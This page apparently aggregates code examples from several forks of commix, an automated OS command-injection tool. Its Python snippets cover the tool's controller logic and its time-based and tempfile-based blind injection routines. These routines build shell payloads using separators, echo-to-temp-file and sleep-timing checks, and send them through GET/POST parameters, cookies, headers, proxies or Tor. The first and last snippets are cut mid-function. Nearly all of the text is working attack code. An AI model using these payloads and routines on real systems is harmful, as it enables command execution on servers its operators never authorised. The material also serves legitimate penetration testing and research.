  if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
    if http_request_method == "GET":
      print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
    else:
      print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
  else:
    logs.logs_notification(filename)
  sys.exit(0)
  
#eof
コード例 #18
0
ファイル: controller.py プロジェクト: jack51706/commix
def do_check(url, filename):

    classic_state = False
    eval_based_state = False
    time_based_state = False
    file_based_state = False

    # Check if defined "--delay" option.
    if menu.options.delay:
        delay = menu.options.delay
    else:
        delay = settings.DELAY

    # Do authentication if needed.
    if menu.options.auth_url and menu.options.auth_data:
        authentication.auth_process()
    elif menu.options.auth_url or menu.options.auth_data:
        print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
        sys.exit(0)
    else:
        pass

    # Check if HTTP Method is GET or POST.
    header_name = ""
    if not menu.options.data:
        http_request_method = "GET"
        if not settings.COOKIE_INJECTION and not settings.USER_AGENT_INJECTION and not settings.REFERER_INJECTION:
            url = parameters.do_GET_check(url)
        check_parameter = parameters.vuln_GET_param(url)
        the_type = " parameter "

    else:
        http_request_method = "POST"
        parameter = menu.options.data
        parameter = parameters.do_POST_check(parameter)
        check_parameter = parameters.vuln_POST_param(parameter, url)
        the_type = " parameter "

    # Load modules
    modules_handler.load_modules(url, http_request_method, filename)

    # Cookie Injection
    if settings.COOKIE_INJECTION == True:
        header_name = " Cookie"
        check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
        the_type = " HTTP header "

    # User-Agent Injection
    elif settings.USER_AGENT_INJECTION == True:
        header_name = " User-Agent"
        check_parameter = ""
        the_type = " HTTP header "

    # Referer Injection
    elif settings.REFERER_INJECTION == True:
        header_name = " Referer"
        check_parameter = ""
        the_type = " HTTP header "

    else:
        pass

    if len(check_parameter) != 0:
        check_parameter = " '" + check_parameter + "'"

    print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

    # Estimating the response time (in seconds)
    delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)

    # Check all injection techniques
    if not menu.options.tech:
        # Check if it is vulnerable to classic command injection technique.
        if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
            classic_state = True

        # Check if it is vulnerable to eval-based command injection technique.
        if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
            eval_based_state = True

        # Check if it is vulnerable to time-based blind command injection technique.
        if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
            time_based_state = True

        # Check if it is vulnerable to file-based semiblind command injection technique.
        if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
            file_based_state = True

    else:
        # Check if it is vulnerable to classic command injection technique.
        if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
            # Check if classic results-based command injection technique succeeds.
            if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
                classic_state = True
        elif menu.options.tech == "classic":
            cb_handler.exploitation(url, delay, filename, http_request_method)
        else:
            classic_state = False

        # Check if it is vulnerable to eval-based command injection technique.
        if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
            # Check if eval-based command injection technique succeeds.
            if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
                eval_based_state = True
        elif menu.options.tech == "eval-based":
            eb_handler.exploitation(url, delay, filename, http_request_method)
        else:
            eval_based_state = False

        # Check if it is vulnerable to time-based blind command injection technique.
        if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
            # Check if time-based blind command injection technique succeeds.
            if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
                time_based_state = True
        elif menu.options.tech == "time-based":
            tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
        else:
            time_based_state = False

        # Check if it is vulnerable to file-based semiblind command injection technique.
        if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
            # Check if file-based semiblind command injection technique succeeds.
            if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
                file_based_state = True
        elif menu.options.tech == "file-based":
            fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
        else:
            file_based_state = False

    if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False:
        info_msg = (
            "(x) Critical: The tested ("
            + http_request_method
            + ")"
            + check_parameter
            + " parameter appear to be not injectable."
        )
        if not menu.options.alter_shell:
            info_msg += " Use the option '--alter-shell'"
        else:
            info_msg += " Remove the option '--alter-shell'"
        info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
        print Back.RED + info_msg + Style.RESET_ALL

    # else:
    #   print ""
    sys.exit(0)
コード例 #19
0
ファイル: tempfile_based.py プロジェクト: jdalessandro/commix
def exploitation(url,delay,filename,tmp_path,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Semiblind-based Command Injection"
  technique = "tempfile-based injection technique"
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
    
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print colors.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET

  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()

  for seperator in settings.SEPERATORS:
	    
    # Change TAG on every request to prevent false-positive resutls.
    TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
    
    # Check if defined "--base64" option.
    if menu.options.base64_trick == True:
      B64_ENC_TAG = base64.b64encode(TAG)
      B64_DEC_TRICK = settings.B64_DEC_TRICK
    else:
      B64_ENC_TAG = TAG
      B64_DEC_TRICK = ""
      
    # The output file for file-based injection technique.
    OUTPUT_TEXTFILE = tmp_path + B64_ENC_TAG + ".txt"
    
    tag_length = len(TAG) + 4
    for j in range(1,int(tag_length)):
      
      try:
	if not menu.options.alter_shell:
	  if seperator == ";" :
	    payload = (seperator + " "
		      "str=$(echo " + TAG + " > " + OUTPUT_TEXTFILE + ")" + seperator + " "
		      "str=$(cat " + OUTPUT_TEXTFILE + ")" + seperator + " "
		      # Find the length of the output.
		      "str1=${#str}" + seperator + " "
		      "if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator  + " "
		      "then sleep 0" + seperator + " "
		      "else sleep " + str(delay) + seperator + " "
		      "fi "
		      )
	    
	  elif seperator == "&&" :
	    if http_request_method == "POST":
	      seperator = urllib.quote(seperator)
	      ampersand = "%26"
	    else:
	      ampersand = "&"
	    payload = (ampersand + " " +
		      "sleep 0 " + seperator + " "
		      "str=$(echo "+ TAG + " > '" + OUTPUT_TEXTFILE + "') " + seperator + " "
		      "str=$(cat " + OUTPUT_TEXTFILE + ") " + seperator + " "
		      "str1=${#str} " + seperator + " "
		      "[ " + str(j) + " -eq ${str1} ] " + seperator + " "
		      "sleep " + str(delay)
		      )
	    if http_request_method == "POST":
	      seperator = urllib.unquote(seperator)

	  elif seperator == "||" :
	    payload = (seperator + " "
		      "echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+ 
		      "[ " + str(j) + " -ne $(cat \""+OUTPUT_TEXTFILE+"\" | wc -c) ] " + seperator + " "
		      "sleep " + str(delay)
		      )  
	  else:
	    break
	  
	#-----------------------------------------------------------------------------------------
	#  __Warning__: This (alternative) python-shell is still experimental.
	#-----------------------------------------------------------------------------------------
	else:
	    if seperator == ";" :
	      payload = (seperator + " "
			"str=$(echo " + TAG + " > " + OUTPUT_TEXTFILE + ")" + seperator + " "
			# Find the length of the output, using readline().
			"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\")"+ seperator + " "
			"if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator  + " "
			"then $(python -c \"import time;time.sleep(0)\")"+ seperator + " "
			"else $(python -c \"import time;time.sleep("+ str(delay) +")\")"+ seperator + " "
			"fi "
			)

	    elif seperator == "&&" :
	      if http_request_method == "POST":
		seperator = urllib.quote(seperator)
		ampersand = urllib.quote("&")
	      else:
		ampersand = "&"
	      payload = (ampersand + " " +
			"$(python -c \"import time;time.sleep(0)\") " + seperator + " "
			"str=$(echo "+ TAG + " > " + OUTPUT_TEXTFILE + ") " + seperator + " "
			# Find the length of the output, using readline().
			"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + seperator + " "
			"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
			"$(python -c \"import time;time.sleep("+ str(delay) +")\") "
			)
	      if http_request_method == "POST":
		seperator = urllib.unquote(seperator)

	    elif seperator == "||" :
	      payload = (seperator + " "
			"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+ 
			# Find the length of the output, using readline().
			"[ " + str(j) + " -ne $(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") ] " + seperator + " "
			"$(python -c \"import time;time.sleep(0)\") | $(python -c \"import time;time.sleep("+ str(delay) +")\")"
			) 
	    else:
	      break
	  #-----------------------------------------------------------------------------------------  

	# Check if defined "--verbose" option.
	if menu.options.verbose:
	  if seperator == ";" or seperator == "&&" or seperator == "||":
	    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

	start = 0
	end = 0
	start = time.time()
	
	# Check if defined method is GET (Default).
	if http_request_method == "GET":
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  url = parameters.do_GET_check(url)
	  
	  # Encoding non-ASCII characters payload.
	  payload = urllib.quote(payload)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_GET_param(url)
	    
	  target = re.sub(settings.INJECT_TAG, payload, url)
	  request = urllib2.Request(target)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
	    
	# Check if defined method is POST.
	else:
	  
	  parameter = menu.options.data
	  parameter = urllib2.unquote(parameter)
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  parameter = parameters.do_POST_check(parameter)

	  # Define the POST data
	  data = re.sub(settings.INJECT_TAG, payload, parameter)
	  request = urllib2.Request(url, data)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_POST_param(parameter,url)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
コード例 #20
0
ファイル: fb_injector.py プロジェクト: evilrovot/commix
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)

    # Check if defined extra headers.
    headers.do_check(request)

    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
    
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 

    # Check if defined Tor.
    elif menu.options.tor:
      try:
        response = tor.use_tor(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
コード例 #21
0
ファイル: controller.py プロジェクト: doctordeep/commix
def do_check(url, filename):

    classic_state = False
    eval_based_state = False
    time_based_state = False
    file_based_state = False

    # Check if defined "--delay" option.
    if menu.options.delay:
        delay = menu.options.delay
    else:
        delay = settings.DELAY

    # Check if authentication is needed.
    if menu.options.auth_url and menu.options.auth_data:
        # Do the authentication process.
        authentication.authentication_process()
        # Check if authentication page is the same with the next (injection) URL
        if urllib2.urlopen(url).read() == urllib2.urlopen(
                menu.options.auth_url).read():
            print Back.RED + "(x) Error: It seems that the authentication procedure has failed." + Style.RESET_ALL
            sys.exit(0)
    elif menu.options.auth_url or menu.options.auth_data:
        print Back.RED + "(x) Error: You must specify both login panel URL and login parameters." + Style.RESET_ALL
        sys.exit(0)
    else:
        pass

    # Check if HTTP Method is GET or POST.
    header_name = ""
    if not menu.options.data:
        http_request_method = "GET"
        if not settings.COOKIE_INJECTION \
        and not settings.USER_AGENT_INJECTION \
        and not settings.REFERER_INJECTION:
            url = parameters.do_GET_check(url)
        check_parameter = parameters.vuln_GET_param(url)
        the_type = " parameter "

    else:
        http_request_method = "POST"
        parameter = menu.options.data
        parameter = parameters.do_POST_check(parameter)
        check_parameter = parameters.vuln_POST_param(parameter, url)
        the_type = " parameter "

    # Load modules
    modules_handler.load_modules(url, http_request_method, filename)

    # Cookie Injection
    if settings.COOKIE_INJECTION == True:
        header_name = " Cookie"
        check_parameter = parameters.specify_cookie_parameter(
            menu.options.cookie)
        the_type = " HTTP header "

    # User-Agent Injection
    elif settings.USER_AGENT_INJECTION == True:
        header_name = " User-Agent"
        check_parameter = ""
        the_type = " HTTP header "

    # Referer Injection
    elif settings.REFERER_INJECTION == True:
        header_name = " Referer"
        check_parameter = ""
        the_type = " HTTP header "

    else:
        pass

    if len(check_parameter) != 0:
        check_parameter = " '" + check_parameter + "'"

    print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

    # Estimating the response time (in seconds)
    delay, url_time_response = requests.estimate_response_time(
        url, http_request_method, delay)

    # Check all injection techniques
    if not menu.options.tech:
        # Check if it is vulnerable to classic command injection technique.
        if cb_handler.exploitation(url, delay, filename,
                                   http_request_method) != False:
            classic_state = True

        # Check if it is vulnerable to eval-based command injection technique.
        if eb_handler.exploitation(url, delay, filename,
                                   http_request_method) != False:
            eval_based_state = True

        # Check if it is vulnerable to time-based blind command injection technique.
        if tb_handler.exploitation(url, delay, filename, http_request_method,
                                   url_time_response) != False:
            time_based_state = True

        # Check if it is vulnerable to file-based semiblind command injection technique.
        if fb_handler.exploitation(url, delay, filename, http_request_method,
                                   url_time_response) != False:
            file_based_state = True

    else:
        # Check if it is vulnerable to classic command injection technique.
        if "classic" in menu.options.tech or len(
                menu.options.tech) <= 4 and "c" in menu.options.tech:
            # Check if classic results-based command injection technique succeeds.
            if cb_handler.exploitation(url, delay, filename,
                                       http_request_method) != False:
                classic_state = True
        elif menu.options.tech == "classic":
            cb_handler.exploitation(url, delay, filename, http_request_method)
        else:
            classic_state = False

        # Check if it is vulnerable to eval-based command injection technique.
        if "eval-based" in menu.options.tech or len(
                menu.options.tech) <= 4 and "e" in menu.options.tech:
            # Check if eval-based command injection technique succeeds.
            if eb_handler.exploitation(url, delay, filename,
                                       http_request_method) != False:
                eval_based_state = True
        elif menu.options.tech == "eval-based":
            eb_handler.exploitation(url, delay, filename, http_request_method)
        else:
            eval_based_state = False

        # Check if it is vulnerable to time-based blind command injection technique.
        if "time-based" in menu.options.tech or len(
                menu.options.tech) <= 4 and "t" in menu.options.tech:
            # Check if time-based blind command injection technique succeeds.
            if tb_handler.exploitation(url, delay, filename,
                                       http_request_method,
                                       url_time_response) != False:
                time_based_state = True
        elif menu.options.tech == "time-based":
            tb_handler.exploitation(url, delay, filename, http_request_method,
                                    url_time_response)
        else:
            time_based_state = False

        # Check if it is vulnerable to file-based semiblind command injection technique.
        if "file-based" in menu.options.tech or len(
                menu.options.tech) <= 4 and "f" in menu.options.tech:
            # Check if file-based semiblind command injection technique succeeds.
            if fb_handler.exploitation(url, delay, filename,
                                       http_request_method,
                                       url_time_response) != False:
                file_based_state = True
        elif menu.options.tech == "file-based":
            fb_handler.exploitation(url, delay, filename, http_request_method,
                                    url_time_response)
        else:
            file_based_state = False

    if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False:
        info_msg = "(x) Critical: The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
        if not menu.options.alter_shell:
            info_msg += " Use the option '--alter-shell'"
        else:
            info_msg += " Remove the option '--alter-shell'"
        info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
        print Back.RED + info_msg + Style.RESET_ALL

    # else:
    #   print ""
    sys.exit(0)
コード例 #22
0
ファイル: fb_injector.py プロジェクト: myselfsufiyan/commix
def injection_test(payload, http_request_method, url):

    # Check if defined method is GET (Default).
    if http_request_method == "GET":

        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)

        # Encoding spaces.
        payload = payload.replace(" ", "%20")

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_GET_param(url)

        target = url.replace(settings.INJECT_TAG, payload)
        request = _urllib.request.Request(target)

        # Check if defined extra headers.
        headers.do_check(request)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    # Check if defined method is POST.
    else:
        parameter = menu.options.data
        parameter = _urllib.parse.unquote(parameter)
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
        # Define the POST data
        if settings.IS_JSON:
            data = parameter.replace(
                settings.INJECT_TAG,
                _urllib.parse.unquote(payload.replace("\"", "\\\"")))
            try:
                data = checks.json_data(data)
            except ValueError:
                pass
        elif settings.IS_XML:
            data = parameter.replace(settings.INJECT_TAG,
                                     _urllib.parse.unquote(payload))
        else:
            data = parameter.replace(settings.INJECT_TAG, payload)
        request = _urllib.request.Request(url, data)

        # Check if defined extra headers.
        headers.do_check(request)

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    return response, vuln_parameter
コード例 #23
0
ファイル: controller.py プロジェクト: foxweek/commix
def do_check(url, filename):

    check_http_headers = False

    # Check if defined "--delay" option.
    if menu.options.delay:
        delay = menu.options.delay
    else:
        delay = settings.DELAY

    # Check if authentication is needed.
    if menu.options.auth_url and menu.options.auth_data:
        # Do the authentication process.
        authentication.authentication_process()
        # Check if authentication page is the same with the next (injection) URL
        if urllib2.urlopen(url).read() == urllib2.urlopen(
                menu.options.auth_url).read():
            print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
            sys.exit(0)
    elif menu.options.auth_url or menu.options.auth_data:
        print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
        sys.exit(0)
    else:
        pass

    # Check if HTTP Method is GET.
    if not menu.options.data:

        # Enable Cookie Injection
        if menu.options.cookie and menu.options.level > 1:
            settings.COOKIE_INJECTION = True

        http_request_method = "GET"

        # Check for stored injections on User-agent / Referer headers (if level > 2).
        if menu.options.level > 2:
            check_parameter = ""
            stored_http_header_injection(url, check_parameter,
                                         check_http_headers,
                                         http_request_method, filename, delay)

        # Enable Cookie Injection
        if menu.options.cookie:
            settings.COOKIE_INJECTION = True

        if not settings.COOKIE_INJECTION:
            found_url = parameters.do_GET_check(url)
            if found_url != False:
                for i in range(0, len(found_url)):
                    url = found_url[i]
                    check_parameter = parameters.vuln_GET_param(url)
                    # Check if testable parameter(s) are provided
                    if len(settings.TEST_PARAMETER) > 0:
                        if check_parameter in settings.TEST_PARAMETER:
                            # Check for session file
                            if check_for_stored_sessions(
                                    url, http_request_method):
                                injection_proccess(url, check_parameter,
                                                   http_request_method,
                                                   filename, delay)
                    else:
                        if check_for_stored_sessions(url, http_request_method):
                            injection_proccess(url, check_parameter,
                                               http_request_method, filename,
                                               delay)

                if not settings.LOAD_SESSION:
                    for i in range(0, len(found_url)):
                        url = found_url[i]
                        check_parameter = parameters.vuln_GET_param(url)
                        # Check if testable parameter(s) are provided
                        if len(settings.TEST_PARAMETER) > 0:
                            if check_parameter in settings.TEST_PARAMETER:
                                injection_proccess(url, check_parameter,
                                                   http_request_method,
                                                   filename, delay)
                        else:
                            injection_proccess(url, check_parameter,
                                               http_request_method, filename,
                                               delay)

    # Check if HTTP Method is POST.
    else:
        http_request_method = "POST"

        # Check for stored injections on User-agent / Referer headers (if level > 2).
        if menu.options.level > 2:
            check_parameter = ""
            stored_http_header_injection(url, check_parameter,
                                         check_http_headers,
                                         http_request_method, filename, delay)

        # Check if HTTP Method is POST.
        parameter = menu.options.data
        found_parameter = parameters.do_POST_check(parameter)
        # Remove whitespaces
        # Check if singe entry parameter
        if type(found_parameter) is str:
            found_parameter_list = []
            found_parameter_list.append(found_parameter)
            found_parameter = found_parameter_list

        # Remove whitespaces
        found_parameter = [x.replace(" ", "") for x in found_parameter]

        # Check if multiple parameters
        for i in range(0, len(found_parameter)):
            parameter = menu.options.data = found_parameter[i]
            check_parameter = parameters.vuln_POST_param(parameter, url)
            if len(check_parameter) > 0:
                settings.TESTABLE_PARAMETER = check_parameter
            # Check if testable parameter(s) are provided
            if len(settings.TEST_PARAMETER) > 0:
                if check_parameter in settings.TEST_PARAMETER:
                    # Check for session file
                    if check_for_stored_sessions(url, http_request_method):
                        injection_proccess(url, check_parameter,
                                           http_request_method, filename,
                                           delay)
            else:
                if check_for_stored_sessions(url, http_request_method):
                    injection_proccess(url, check_parameter,
                                       http_request_method, filename, delay)

        if not settings.LOAD_SESSION:
            for i in range(0, len(found_parameter)):
                parameter = menu.options.data = found_parameter[i]
                check_parameter = parameters.vuln_POST_param(parameter, url)
                # Check if testable parameter(s) are provided
                if len(settings.TEST_PARAMETER) > 0:
                    if check_parameter in settings.TEST_PARAMETER:
                        injection_proccess(url, check_parameter,
                                           http_request_method, filename,
                                           delay)
                else:
                    injection_proccess(url, check_parameter,
                                       http_request_method, filename, delay)

    # Enable Cookie Injection
    if menu.options.cookie and menu.options.level > 1:
        settings.COOKIE_INJECTION = True

    # Cookie Injection
    if settings.COOKIE_INJECTION == True:
        cookie_value = menu.options.cookie
        # Check for stored injections on User-agent / Referer headers (if level > 2).
        if menu.options.level > 2:
            check_parameter = ""
            stored_http_header_injection(url, check_parameter,
                                         check_http_headers,
                                         http_request_method, filename, delay)

        header_name = " Cookie"
        settings.HTTP_HEADER = header_name[1:].lower()
        cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
        if type(cookie_parameters) is str:
            cookie_parameters_list = []
            cookie_parameters_list.append(cookie_parameters)
            cookie_parameters = cookie_parameters_list

        # Remove whitespaces
        cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]

        for i in range(0, len(cookie_parameters)):
            menu.options.cookie = cookie_parameters[i]
            check_parameter = parameters.specify_cookie_parameter(
                menu.options.cookie)
            if len(check_parameter) > 0:
                settings.TESTABLE_PARAMETER = check_parameter
            # Check if testable parameter(s) are provided
            if len(settings.TEST_PARAMETER) > 0:
                if check_parameter in settings.TEST_PARAMETER:
                    # Check for session file
                    if check_for_stored_sessions(url, http_request_method):
                        injection_proccess(url, check_parameter,
                                           http_request_method, filename,
                                           delay)
            else:
                if check_for_stored_sessions(url, http_request_method):
                    injection_proccess(url, check_parameter,
                                       http_request_method, filename, delay)

        if not settings.LOAD_SESSION:
            for i in range(0, len(cookie_parameters)):
                menu.options.cookie = cookie_parameters[i]
                check_parameter = parameters.specify_cookie_parameter(
                    menu.options.cookie)
                if len(check_parameter) > 0:
                    settings.TESTABLE_PARAMETER = check_parameter
                # Check if testable parameter(s) are provided
                if len(settings.TEST_PARAMETER) > 0:
                    if check_parameter in settings.TEST_PARAMETER:
                        injection_proccess(url, check_parameter,
                                           http_request_method, filename,
                                           delay)
                else:
                    injection_proccess(url, check_parameter,
                                       http_request_method, filename, delay)

    if settings.COOKIE_INJECTION == True:
        # Restore cookie value
        menu.options.cookie = cookie_value
        # Disable cookie injection
        settings.COOKIE_INJECTION = False

    # Custom header Injection
    if settings.CUSTOM_HEADER_INJECTION == True:
        check_parameter = header_name = " " + settings.CUSTOM_HEADER_NAME
        settings.HTTP_HEADER = header_name[1:].lower()
        check_for_stored_sessions(url, http_request_method)
        injection_proccess(url, check_parameter, http_request_method, filename,
                           delay)

    # Check for stored injections on User-agent / Referer headers (if level > 2).
    if menu.options.level > 2:
        check_parameter = ""
        check_http_headers = True
        stored_http_header_injection(url, check_parameter, check_http_headers,
                                     http_request_method, filename, delay)

    # All injection techniques seems to be failed!
    if settings.CLASSIC_STATE == settings.EVAL_BASED_STATE == settings.TIME_BASED_STATE == settings.FILE_BASED_STATE == False:
        info_msg = settings.CRITICAL_SIGN + "All the tested (" + http_request_method + ") parameters appear to be not injectable."
        if not menu.options.alter_shell:
            info_msg += " Try to use the option '--alter-shell'"
        else:
            info_msg += " Try to remove the option '--alter-shell'"
        if menu.options.level < 3:
            info_msg += " and/or try to increase '--level' values to perform more tests (i.e 'User-Agent', 'Referer', 'Cookie' etc)"
        info_msg += "."
        print Back.RED + info_msg + Style.RESET_ALL
    sys.exit(0)


#eof
コード例 #24
0
def injection_test(payload, http_request_method, url):

    # Check if defined method is GET (Default).
    if http_request_method == "GET":

        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)

        # Encoding spaces.
        payload = payload.replace(" ", "%20")

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_GET_param(url)

        target = re.sub(settings.INJECT_TAG, payload, url)
        request = urllib2.Request(target)

        # Check if defined extra headers.
        headers.do_check(request)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    # Check if defined method is POST.
    else:
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)

        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = parameter.replace("+", "%2B")

        # Define the POST data
        if settings.IS_JSON == False:
            data = re.sub(settings.INJECT_TAG, payload, parameter)
            request = urllib2.Request(url, data)
        else:
            payload = payload.replace("\"", "\\\"")
            data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                          parameter)
            try:
                data = json.loads(data, strict=False)
            except:
                pass
            request = urllib2.Request(url, json.dumps(data))

        # Check if defined extra headers.
        headers.do_check(request)

        # Define the vulnerable parameter
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

        try:
            # Get the response of the request
            response = requests.get_request_response(request)
        except KeyboardInterrupt:
            response = None

    return response, vuln_parameter
コード例 #25
0
ファイル: time_based.py プロジェクト: jdalessandro/commix
def exploitation(url,delay,filename,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
    
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print colors.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET

  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for seperator in settings.SEPERATORS:

	# Check for bad combination of prefix and seperator
	combination = prefix + seperator
	if combination in settings.JUNK_COMBINATION:
	  prefix = ""
	
	# Change TAG on every request to prevent false-positive resutls.
	TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
	tag_length = len(TAG) + 4
	for j in range(1,int(tag_length)):
	  try:
	    if seperator == ";" :
	      payload = (seperator + " "
			"str=$(echo "+TAG+")" + seperator + " "
			# Find the length of the output.
			"str1=${#str}" + seperator + " "
			"if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator  + " "
			"then sleep 0" + seperator + " "
			"else sleep " + str(delay) + seperator + " "
			"fi "
			)
	      
	    elif seperator == "&&" :
	      if http_request_method == "POST":
		seperator = urllib.quote(seperator)
		ampersand = urllib.quote("&")
	      else:
		ampersand = "&"
	      payload = (ampersand + " " +
			"sleep 0  " + seperator + " "
			"str=$(echo "+TAG+") " + seperator + " "
			# Find the length of the output.
			"str1=${#str} " + seperator + " "
			"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
			"sleep 1 "
			)
	      if http_request_method == "POST":
		seperator = urllib.unquote(seperator)

	    elif seperator == "||" :
	      payload = (seperator + " "
			"echo '" + TAG + "' | "+ 
			"[ "+str(j)+" -ne $(echo \""+TAG+"\" | wc -c) ] " + seperator + " "
			"sleep " + str(delay) + " "
			)  
	    else:
	      break

	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	    else:
	      payload = prefix + payload

	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	    else:
	      payload = payload + suffix
	      
	    # Check if defined "--verbose" option.
	    if menu.options.verbose:
	      if seperator == ";" or seperator == "&&" or seperator == "||":
